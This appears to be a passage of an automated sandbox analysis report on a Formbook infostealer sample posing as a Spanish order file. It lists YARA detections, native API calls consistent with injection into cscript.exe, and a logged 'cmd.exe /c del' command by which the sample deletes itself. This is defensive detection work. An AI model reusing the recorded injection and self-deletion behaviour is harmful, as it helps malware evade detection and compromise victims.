Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_00A85C24 0_2_00A85C24
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_02BC8250 0_2_02BC8250
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_02BCD2F8 0_2_02BCD2F8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_05635AA0 0_2_05635AA0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 0_2_05635AB0 0_2_05635AB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BC78 3_2_0041BC78
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00408C7B 3_2_00408C7B
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00408C80 3_2_00408C80
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BD01 3_2_0041BD01
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041BEE0 3_2_0041BEE0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041CFB6 3_2_0041CFB6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00DE5C24 3_2_00DE5C24
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019BF900 3_2_019BF900
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D4120 3_2_019D4120
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A820A8 3_2_01A820A8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CB090 3_2_019CB090
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E20A0 3_2_019E20A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A828EC 3_2_01A828EC
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A71002 3_2_01A71002
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019EEBB0 3_2_019EEBB0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7DBD2 3_2_01A7DBD2
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82B28 3_2_01A82B28
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A822AE 3_2_01A822AE
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019E2581 3_2_019E2581
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A825DD 3_2_01A825DD
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019CD5E0 3_2_019CD5E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82D07 3_2_01A82D07
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019B0D20 3_2_019B0D20
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A81D55 3_2_01A81D55
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019C841F 3_2_019C841F
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7D466 3_2_01A7D466
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A81FF1 3_2_01A81FF1
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A82EF7 3_2_01A82EF7
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019D6E30 3_2_019D6E30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_01A7D616 3_2_01A7D616
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478841F 16_2_0478841F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483D466 16_2_0483D466
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04770D20 16_2_04770D20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048425DD 16_2_048425DD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842D07 16_2_04842D07
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478D5E0 16_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841D55 16_2_04841D55
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A2581 16_2_047A2581
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04796E30 16_2_04796E30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842EF7 16_2_04842EF7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483D616 16_2_0483D616
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04841FF1 16_2_04841FF1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048420A8 16_2_048420A8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048428EC 16_2_048428EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04831002 16_2_04831002
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047A20A0 16_2_047A20A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0478B090 16_2_0478B090
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04794120 16_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0477F900 16_2_0477F900
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_048422AE 16_2_048422AE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0483DBD2 16_2_0483DBD2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_04842B28 16_2_04842B28
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047AEBB0 16_2_047AEBB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BC78 16_2_0061BC78
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00608C7B 16_2_00608C7B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00608C80 16_2_00608C80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BD01 16_2_0061BD01
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00602D90 16_2_00602D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061BEE0 16_2_0061BEE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00602FB0 16_2_00602FB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061CFB6 16_2_0061CFB6
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: String function: 019BB150 appears 35 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0477B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004185E0 NtCreateFile, 3_2_004185E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00418690 NtReadFile, 3_2_00418690
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_00418710 NtClose, 3_2_00418710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004187C0 NtAllocateVirtualMemory, 3_2_004187C0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004185DA NtCreateFile, 3_2_004185DA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_0041870C NtReadFile,NtClose, 3_2_0041870C
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_004187BA NtAllocateVirtualMemory, 3_2_004187BA
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F99A0 NtCreateSection,LdrInitializeThunk, 3_2_019F99A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_019F9910
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_019F98F0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9840 NtDelayExecution,LdrInitializeThunk, 3_2_019F9840
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_019F9860
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_019F9A00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A20 NtResumeThread,LdrInitializeThunk, 3_2_019F9A20
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A50 NtCreateFile,LdrInitializeThunk, 3_2_019F9A50
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F95D0 NtClose,LdrInitializeThunk, 3_2_019F95D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9540 NtReadFile,LdrInitializeThunk, 3_2_019F9540
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_019F9780
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_019F97A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_019F9FE0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_019F9710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_019F96E0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_019F9660
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F99D0 NtCreateProcessEx, 3_2_019F99D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9950 NtQueueApcThread, 3_2_019F9950
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F98A0 NtWriteVirtualMemory, 3_2_019F98A0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9820 NtEnumerateKey, 3_2_019F9820
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FB040 NtSuspendThread, 3_2_019FB040
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA3B0 NtGetContextThread, 3_2_019FA3B0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9B00 NtSetValueKey, 3_2_019F9B00
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A80 NtOpenDirectoryObject, 3_2_019F9A80
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9A10 NtQuerySection, 3_2_019F9A10
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F95F0 NtQueryInformationFile, 3_2_019F95F0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FAD30 NtSetContextThread, 3_2_019FAD30
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9520 NtWaitForSingleObject, 3_2_019F9520
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9560 NtWriteFile, 3_2_019F9560
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA710 NtOpenProcessToken, 3_2_019FA710
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9730 NtQueryVirtualMemory, 3_2_019F9730
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019FA770 NtOpenThread, 3_2_019FA770
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9770 NtSetInformationFile, 3_2_019F9770
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9760 NtOpenProcess, 3_2_019F9760
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F96D0 NtCreateKey, 3_2_019F96D0
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9610 NtEnumerateValueKey, 3_2_019F9610
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9650 NtQueryValueKey, 3_2_019F9650
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 3_2_019F9670 NtQueryInformationProcess, 3_2_019F9670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9540 NtReadFile,LdrInitializeThunk, 16_2_047B9540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B95D0 NtClose,LdrInitializeThunk, 16_2_047B95D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_047B9660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9650 NtQueryValueKey,LdrInitializeThunk, 16_2_047B9650
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_047B96E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B96D0 NtCreateKey,LdrInitializeThunk, 16_2_047B96D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_047B9710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_047B9FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_047B9780
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_047B9860
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9840 NtDelayExecution,LdrInitializeThunk, 16_2_047B9840
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_047B9910
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B99A0 NtCreateSection,LdrInitializeThunk, 16_2_047B99A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk, 16_2_047B9A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9560 NtWriteFile, 16_2_047B9560
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BAD30 NtSetContextThread, 16_2_047BAD30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9520 NtWaitForSingleObject, 16_2_047B9520
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B95F0 NtQueryInformationFile, 16_2_047B95F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9670 NtQueryInformationProcess, 16_2_047B9670
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9610 NtEnumerateValueKey, 16_2_047B9610
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9770 NtSetInformationFile, 16_2_047B9770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA770 NtOpenThread, 16_2_047BA770
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9760 NtOpenProcess, 16_2_047B9760
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9730 NtQueryVirtualMemory, 16_2_047B9730
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA710 NtOpenProcessToken, 16_2_047BA710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B97A0 NtUnmapViewOfSection, 16_2_047B97A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BB040 NtSuspendThread, 16_2_047BB040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9820 NtEnumerateKey, 16_2_047B9820
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B98F0 NtReadVirtualMemory, 16_2_047B98F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B98A0 NtWriteVirtualMemory, 16_2_047B98A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9950 NtQueueApcThread, 16_2_047B9950
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B99D0 NtCreateProcessEx, 16_2_047B99D0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A20 NtResumeThread, 16_2_047B9A20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A10 NtQuerySection, 16_2_047B9A10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A00 NtProtectVirtualMemory, 16_2_047B9A00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9A80 NtOpenDirectoryObject, 16_2_047B9A80
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047B9B00 NtSetValueKey, 16_2_047B9B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_047BA3B0 NtGetContextThread, 16_2_047BA3B0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006185E0 NtCreateFile, 16_2_006185E0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00618690 NtReadFile, 16_2_00618690
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_00618710 NtClose, 16_2_00618710
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006187C0 NtAllocateVirtualMemory, 16_2_006187C0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006185DA NtCreateFile, 16_2_006185DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_0061870C NtReadFile,NtClose, 16_2_0061870C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 16_2_006187BA NtAllocateVirtualMemory, 16_2_006187BA
Sample file is different than original file name gathered from version info
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilename vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilename vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Binary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
Source: Nuevo Pedido.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Nuevo Pedido.exe Virustotal: Detection: 32%
Source: Nuevo Pedido.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.Identifier
Source: Nuevo Pedido.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Nuevo Pedido.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@11/6
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
